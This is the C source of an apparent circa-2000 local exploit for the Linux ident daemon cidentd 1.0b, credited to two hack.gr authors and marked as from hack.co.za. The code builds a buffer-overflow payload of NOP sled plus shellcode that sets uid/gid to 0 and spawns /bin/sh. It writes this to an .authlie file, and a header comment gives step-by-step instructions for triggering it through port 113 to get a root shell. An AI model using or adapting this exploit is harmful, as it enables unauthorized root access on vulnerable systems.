/*  linux cidentd 1.0b exploit I
 *  By Jackal (jackal@hack.gr) & mastoras (mastoras@hack.gr)
 *
 *  Greetz to:
 *  KoD, DiJ, m0nty, Synner, Egofan, guys at #grhack & users of hack.gr
 * 
 *  Compile it and run it in your $HOME directory. It should creat()
 *  an .authlie file. Then e.x. "telnet localhost 110", find your port
 *  by using netstat(8), "telnet localhost 113", give the ports and
 *  you're done. (test it with "id;")
 *
 *  Some code is of course stolen.
 *
 *  Oh, please distribute this :-p
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE            1060
#define NOP                            0x90

char shellcode[] =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";

unsigned long get_sp(void)
{
  __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[])
{
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
  int i;
  int fd;

  if (argc > 1)
    bsize = atoi(argv[1]);
  if (argc > 2)
    offset = atoi(argv[2]);

  if (!(buff = malloc(bsize)))
    {
      printf("Can't allocate memory.\n");
      exit(0);
    }
  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i += 4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize / 2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  fd = creat(".authlie", 0644);
  write(fd, buff, bsize);
  close(fd);
}
/*                    www.hack.co.za              [2000]*/